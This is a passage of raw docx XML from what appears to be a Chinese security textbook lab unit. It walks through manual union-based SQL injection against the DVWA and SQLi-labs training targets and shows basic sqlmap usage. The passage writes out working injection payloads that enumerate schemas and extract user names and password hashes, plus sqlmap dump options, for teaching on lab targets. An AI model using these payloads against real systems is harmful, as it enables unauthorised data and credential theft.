        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[/交叉回指框]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本单元使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA（Damn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerable Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application）Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全级别的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi-labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关（Less-1）。这两套靶机已在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章详细搭建完毕，读者可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;/dvwa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;/sqli-labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问。确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全等级设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Low，SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认即为第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令与操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">手工注入：DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection (Low)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤1: 登录 DVWA，进入 SQL Injection 模块。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤2: 在输入框提交 1，观察正常回显。（Burp 可选：开启代理拦截，将请求送入 Repeater）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤3: 探测列数 —— 用 ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 依次在 Burp Repeater 中发送（修改 id 参数值）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 1 --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3 --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：ORDER BY 2 正常，ORDER BY 3 报错？对 DVWA Low 的 SQL Injection，原查询 SELECT first_name,last_name FROM users WHERE user_id='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'，故列数为 2。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 实际结果因靶机版本而异。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤4: 定位回显列</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：页面回显两个数字 1 和 2，说明两个列都在页面回显。DVWA Low 默认将 first_name 和 last_name 均输出到页面。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤5: 枚举数据库信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 获取当前数据库名和用户：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT user,database --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：页面第一个回显位置显示当前数据库用户（如 root@localhost），第二个回显位置显示当前数据库名（如 dvwa）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 枚举所有数据库：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,group_concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.schemata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：第二个回显位置显示以逗号分隔的数据库名列表。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 枚举 dvwa 库的所有表：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：显示 guestbook,users 等表名。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 枚举 users 表的所有列：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,group_concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.columns WHERE table_schema=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'dvwa'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：显示 user_id,user,password,avatar 等列名。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 提取用户凭据：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT user,password FROM dvwa.users --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：页面显示所有用户名与对应的 MD5/SHA1 密码哈希值（实际哈希因 DVWA 版本而异）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DVWA Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的回显友好，以上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅教学演示联合查询注入的基本流程，实际高安全级别需绕过转义或使用盲注技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">手工注入：SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Less-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Less-1 是一个经典的 GET 型单引号字符注入。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤1: 访问 http://&lt;TARGET_IP&gt;/sqli-labs/Less-1/?id=1，正常回显。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤2: 试探闭合</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：报错，提示 SQL 语法错误（如 "You have an error in your SQL syntax; check the manual..."）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤3: 推断闭合方式 —— 观察报错内容中的多余单引号，尝试注释符闭合：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 注意：--+ 是 URL 编码的注释符，+ 在 URL 中表示空格，-- 后必须有空格。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：正常回显，闭合成功。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤4: 列数探测</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 3 --+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：ORDER BY 3 正常，ORDER BY 4 报错，列数为 3。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤5: 定位回显列</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 1,2,3 --+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 使用 id=-1 使原查询返回空结果，保证页面只显示 UNION SELECT 的数据。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：页面显示 2,3 等数字，表明第 2、3 列有回显。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 步骤6: 枚举</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?id=-1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1,user,database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 预期：第 2 列显示当前数据库用户，第 3 列显示当前数据库名（如 security）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自动化注入：sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">基础用法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sqlmap 是开源自动化 SQL 注入检测与利用工具（https://sqlmap.org）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 以下命令仅限授权靶机环境使用。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 基础数据库枚举（GET 请求单参数）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://&lt;TARGET_IP&gt;/sqli-labs/Less-1/?id=1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sqlmap 会自动探测注入点、确认可注入类型（联合查询/盲注/报错等），</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 然后列出所有数据库名。具体输出因靶机版本而异。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --dbs 意为枚举数据库（database schema）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 常用参数：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --tables : 枚举指定数据库的表（需配合 -D &lt;DB_NAME&gt;）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --columns : 枚举指定表的列（需配合 -T &lt;TABLE_NAME&gt;）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --dump : 导出表中所有行</w:t>
      </w:r>
      <w:r>
        <w:br/>
